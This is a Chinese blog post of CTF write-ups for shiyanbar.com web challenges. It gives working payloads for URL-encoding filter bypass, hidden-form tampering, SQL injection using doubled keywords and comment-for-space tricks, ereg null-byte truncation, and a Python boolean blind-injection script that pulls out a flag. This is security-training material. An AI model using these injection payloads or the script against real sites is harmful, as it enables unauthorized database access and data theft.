关闭

实验吧——WriteUp&&涨姿势(2)

标签: sql注入
267人阅读 评论(1) 收藏 举报
分类:

WriteUp

  1. PHP大法
  2. Forms
  3. 简单sql注入
  4. 简单sql注入2

涨姿势

  1. Once More
  2. 简单sql注入3

PHP大法

原题

这里写图片描述

解题思路

index.php.txt代码审计

WriteUp

浏览器访问index.php.txt
http://ctf5.shiyanbar.com/DUTCTF/index.php.txt

这里写图片描述

代码首先判断 'hackerDJ' 是否是 $_GET[id]的子串,是就退出
不然对 $_GET[id]进行urldecode
然后判断 'hackerDJ' == $_GET[id] ,相等则输出flag
所以只需对参数urlencode即可,需要注意的是需要encode两次,因为浏览器
会自动对urlencode的参数进行decode
playload
http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61

这里写图片描述


Forms

原题

这里写图片描述

解题思路

页面源代码发现有个隐藏表单

WriteUp

隐藏表单可以利用

这里写图片描述

随便输入一个PIN,Burp Suite抓包分析

这里写图片描述

隐藏表单出现了,试试不修改直接发送

这里写图片描述

报错,那改成和PIN一样的

这里写图片描述

获取到源码

这里写图片描述

将那一串数字输入即可

这里写图片描述


简单sql注入

原题

这里写图片描述

解题思路

盲注试出过滤的关键词

WriteUp

加‘ 号报错,'=' 爆出数据,猜测查询语句为:
select name from xxx where id = ''

这里写图片描述

继续测试playload
1: 1' or exists(select * from admin) and ''='
2: 1' or exists(selectselect * fromfrom admin) and ''='
3: 1'  or  exists(selectselect  * fromfrom  admin)  andand  ''='
对应报错如下,判断双写可绕过过滤

这里写图片描述

这里写图片描述

这里写图片描述

判断表名:1'  or  exists(selectselect  *  fromfrom  flag)  andand  ''='
判断列名:1'  or  exists(selectselect  flag  fromfrom  flag)  andand  ''='
联合查询:1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  ''='

这里写图片描述


简单sql注入2

原题

解题思路

过滤了空格而已

WriteUp

playload:1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/''='

这里写图片描述


Once More

原题

这里写图片描述

解题思路

ereg()%00截断漏洞

WriteUp

根据题目要求,password只能出现字母和数字,长度小于8,值大于9999999,包含*-*
第一个要求:%00截断,隐藏后面的*-*
第二个要求:科学记数法
第三个要求:在password末尾加上*-*
playload: 1e9%00*-*

这里写图片描述

涨姿势点

ereg()的%00截断漏洞

备注

strlen()和字符串转数字还可以再看看

简单sql注入3

原题

这里写图片描述

解题思路

Bool 盲注,看是否报错确定注入代码的正确性

WriteUp

测试playload
1. 1' and exists(select * from admin) and ''='
2. 1' and exists(select flag from flag) and ''='
3. 1' and exists(select name from flag) and ''='

这里写图片描述

这里写图片描述

注入正确就显示Hello,错误则提示相应信息,所以可以根据是否输出Hello判断注入的正确性
爆出表名flag和列名flag,逐个爆flag列的字符即可
import requests
flag = ''
for i in range(1,30):
    for n in range(33,126):
         url = 'http://ctf5.shiyanbar.com/web/index_3.php?id=1%27%20and%20ascii(substr((select%20flag%20from%20flag),'+str(i)+',1))='+str(n)+'%23'
         html = requests.get(url).text
         if 'Hello' in html:
             flag += chr(n)
             break
print(flag)

涨姿势点

Bool盲注的首次接触与应用,理解了什么是Bool盲注并简单利用

2
0
查看评论

实验吧——WriteUp&&涨姿势(8)

涨姿势 64格 A记录
  • sinat_34200786
  • sinat_34200786
  • 2017-07-31 12:19
  • 441

实验吧——WriteUp&&涨姿势(5)

WriteUp 奇怪的短信 奇怪的字符串 疑惑的汉字 困在栅栏里的凯撒 围在栅栏中的爱 奇妙的音乐 我喜欢培根 杯酒人生 敌军情报 涨姿势 古典密码 神秘字母
  • sinat_34200786
  • sinat_34200786
  • 2017-06-11 21:44
  • 537

实验吧——WriteUp&&涨姿势(7)

WriteUp 这是一个坑 flag.xls 图片里的动漫 保险箱 涨姿势 Canon BAT公司信息查询系统 社交网络 矛盾的in2
  • sinat_34200786
  • sinat_34200786
  • 2017-07-23 23:48
  • 543

实验吧——WriteUp&&涨姿势(1)

WP1.NSCTF web200 2.Forbidden 3.猫抓老鼠涨姿势1.上传绕过 2.Guess Next Session 3.天下武功唯快不破 4.what a fuck!这是什么鬼东西? 5.头有点大NSCTF web200
  • sinat_34200786
  • sinat_34200786
  • 2017-04-15 17:21
  • 913

实验吧——WriteUp&&涨姿势(4)

WriteUp 最安全的管理系统 认真你就输了 so beautiful so white 涨姿势 程序逻辑问题 FALSE
  • sinat_34200786
  • sinat_34200786
  • 2017-05-26 15:23
  • 270

实验吧——WriteUP&&涨姿势(6)

WriteUp RSA实践 一串奇怪的数 兔子你好 NSCTF crypto200 涨姿势 RSAROLL 凯撒和某某加密
  • sinat_34200786
  • sinat_34200786
  • 2017-06-14 12:32
  • 310

实验吧——WriteUp&&涨姿势(3)

WriteUP Fonts 大雄和哆啦A梦 水果 无处不在的广告 想看正面?那就要看仔细了! 多啦a梦 打不开的文件 复杂的QR_code 涨姿势 刷新 刷新 快刷新 guess 小苹果 男神一般都很低调很低调的!! 最低位的亲吻 Fonts原题解题思路打开文件什么都没发现,用HxD看看WriteU...
  • sinat_34200786
  • sinat_34200786
  • 2017-05-20 14:55
  • 762

HBCTF——WriteUp&&涨姿势(2)

WriteUp 巴基斯坦_听音乐 塔吉克_扫一扫 印尼_find_the_key 安哥拉_一步一步 北韩_进过多少次加密 日本_hundouluo 伊朗_爆破 利比亚_密码多简单 越南_真的加密了? 埃塞俄比亚-隐写术 秘鲁_源代码给你又如何
  • sinat_34200786
  • sinat_34200786
  • 2017-04-23 12:13
  • 345

HBCTF——WriteUp&&涨姿势(1)

这次学到了三个姿势 1.CRC校验 2.Zip伪加密 3.PHP伪协议CRC校验
  • sinat_34200786
  • sinat_34200786
  • 2017-04-09 13:11
  • 616

HBCTF——WriteUp&&涨姿势(5)

WriteUp 葡萄牙-签到 涨姿势 西班牙-666 波兰-父亲的信 法国-四六级查询
  • sinat_34200786
  • sinat_34200786
  • 2017-06-18 21:40
  • 248
    个人资料
    • 访问:15078次
    • 积分:784
    • 等级:
    • 排名:千里之外
    • 原创:61篇
    • 转载:0篇
    • 译文:0篇
    • 评论:5条
    文章分类